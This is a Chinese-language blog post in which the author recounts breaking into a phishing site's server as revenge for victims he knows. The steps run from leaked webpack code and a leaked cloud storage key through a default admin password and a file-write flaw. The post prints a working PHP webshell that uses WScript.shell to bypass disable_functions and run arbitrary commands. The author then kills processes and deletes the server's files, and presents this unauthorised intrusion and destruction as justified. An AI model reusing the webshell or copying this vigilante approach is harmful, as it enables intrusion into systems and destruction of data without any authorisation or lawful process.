小伙子，你要“耗子尾汁”

前言

在一个月黑风高的夜晚，我正在打游戏，突然微信像被轰炸一般，疯狂响起消息提示的声音，手机静音继续打游戏，没一会，电话响起来了，女朋友的打来的，一顿质问：“在干嘛，是不是不爱我了，游戏重要还是我重要！“

了解了事情真相，原来她和她的几个同事被人钓鱼了，有的人还中招了。嘿！我这暴脾气，这能忍？搞他！先等我把这把游戏打完。

正传

言归正传，搞他，我倒要看看是什么站竟然能让他们这么多人都上当。访问看看，哟，还挺专业，https都用上了，看着还挺像那么回事，盘它。

直接爆破吗？太容易打草惊蛇，先找找看有什么信息能利用的。好家伙，有webpack泄露，让我来䁖䁖里边都有啥信息，把网站的webpack打包下载下来方便搜索查看。

真是神仙开发，竟然在代码里留下了硬编码的账号密码，登上去看看，不过话又说回来，幸好没选择直接爆破，要不然，这个密码，爆破一个甲子都不一定能爆破出来。登上后台，看看有什么功能。

老子裤子都脱了，你给我看这个？我就不信这个邪，继续盘它。盯着这个泄露的webpack源码翻了半天，猜测是做钓鱼站的人从原网站上扒下来的这一套，又把代码改了改，后台功能只是个摆设，这个钓鱼站的作者的目的更多是想获取你的账号密码，要不然就是还有APP，获取你的隐私信息，不过这个钓鱼的成本就有点高了，大多数人都不会这么干，先继续看webpack代码吧，淦。

翻了半天，终于在代码里发现一个github地址，上去看看都有什么东西。

看样子是个写前端的，但是还不能确定是不是这个钓鱼站的作者，继续找找看。翻遍了这个人的所有项目，终于在一个项目中发现了一个泄露的OSS秘钥，这里我要安利一个工具了“Sourcegraph”，借助这个工具我们就可以不用下载github源码文件，直接在页面进行搜索了。

我们连接这个OSS看看有什么东西。

这不就是那个钓鱼站的图片嘛，应该就是这个人了，在根目录下还有一个excel文件，下载看看是什么东西。

好家伙，记录了不少的手机号、邮箱和密码呀，看来是他没跑了，上传的时间还挺新，先给他删了，免得再祸害其他人。在根目录下还有个备份的压缩包，下载来看看备份的是什么。

嚯，是代码，还是php的。

先看看有没有和这个钓鱼站部署在一起，nmap扫起。

Windows系统，还开了8080，访问看看。

没错，是它，和我拿到的代码中后台的页面一模一样，盘它。先爆破一下后台看看，能进后台就舒服了，试了个admin/123456，卧槽？进来了，你怕不是在逗我，都省的爆破了，也不用在本地搭环境了，直接开审，用的thinkphp3的框架，先看看登录有没有问题吧。

在后台的一个SystemController中发现修改配置的地方能写入文件，而且写入的还是php后缀的文件，这下我只需要构造参数，能让他完整保存语句，webshell能正常执行就可以了，代码拉出来试试。

这里就直接构造一句话吧。

提交之后访问写入的webshell。

卧槽？有disable_functions，既然你能让我写shell了，那我就绕你。构造请求实现下面这个webshell。

<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

绕过了disable_functions能执行命令了，但是怎么都弹不回来shell，不过能执行命令了，也算成果吧，怎么说这权限也是管理员权限。

找到80端口对应的进程id，先把你用来害人的东西都给你删掉。

taskkill /pid 7576，再***见！再找到tomcat的目录，整个给你删掉，让你再祸害四方。

这次彻底删除了，本着劝诫的心，在桌面给这个制作钓鱼站的人留下一句话。

结语

授人以“鱼”不如授人以“娱”，多行不义，终究会被法网打捞上岸。